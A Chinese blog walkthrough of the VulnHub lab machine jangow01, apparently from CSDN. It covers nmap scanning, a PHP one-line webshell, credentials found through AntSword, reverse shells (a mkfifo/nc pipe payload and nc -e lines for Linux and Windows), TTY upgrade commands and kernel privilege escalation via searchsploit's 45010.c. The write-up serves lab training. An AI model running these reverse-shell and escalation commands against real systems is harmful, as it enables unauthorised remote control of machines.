vulnhub靶场4:jangow01

文章描述了一位安全研究员使用nmap进行网络扫描,发现了可利用的21和80端口,成功植入并测试了一句话木马,通过蚁剑工具进行FTP登录并创建了反弹shell。在nc无-e选项的情况下,使用管道方式建立反弹shell,并在Ubuntu16.04系统上进行交互式shell升级和提权操作,最终通过searchsploit找到并执行了提权exploit。
摘要由CSDN通过智能技术生成

1、nmap -sn 192.168.52.0/24

 2、nmap -sC -sV 192.168.52.72

 3、开放21、80端口,访问http看看,发现命令执行

 

 4、写入一句话木马

 5、测试成功

6、蚁剑连接 ,找到几个密码

 

其中 jangow01/abygurl69可以登录ftp

7、nc没有-e选项,无法反弹shell

 8、使用蚁剑写入管道方式的反弹shell脚本

9、443端口成功反弹

10、这个还不是交互式shell ,升级。

   python3 -c 'import pty;pty.spawn("/bin/bash")' 升级切换交互式shell
   export TERM=xterm      //设置终端环境变量
   Ctrl+Z
   stty -a
   stty raw -echo;fg   //关闭回显,调起后台进程到前台
   reset
   stty rows 29 columns 94

 11、查看系统版本,ubuntu 16.04 内核版本4.4.0-31

12、通过searchsploit查看是否有可以提权的点,找到45010.c

 13、通过蚁剑上传,编译,并执行。提权成功,cat /root/proof.txt

########

1、当nc -e被裁剪,使用管道反弹shell

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.52.190 443 >/tmp/f');?>

2、nc反弹

vps攻击机:nc -lvvp 9999      // 监听9999端口
靶机:nc -e /bin/bash 1.1.1.1 9999 // Linux正向连接公网vps1.1.1.1的9999端口  -e指定对应的应用程序
      nc -e c:\windows\system32\cmd.exe 1.1.1.1 9999   // Windows

3、查看系统提权exp

       searchsploit ubuntu 16.04 4.4.0

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值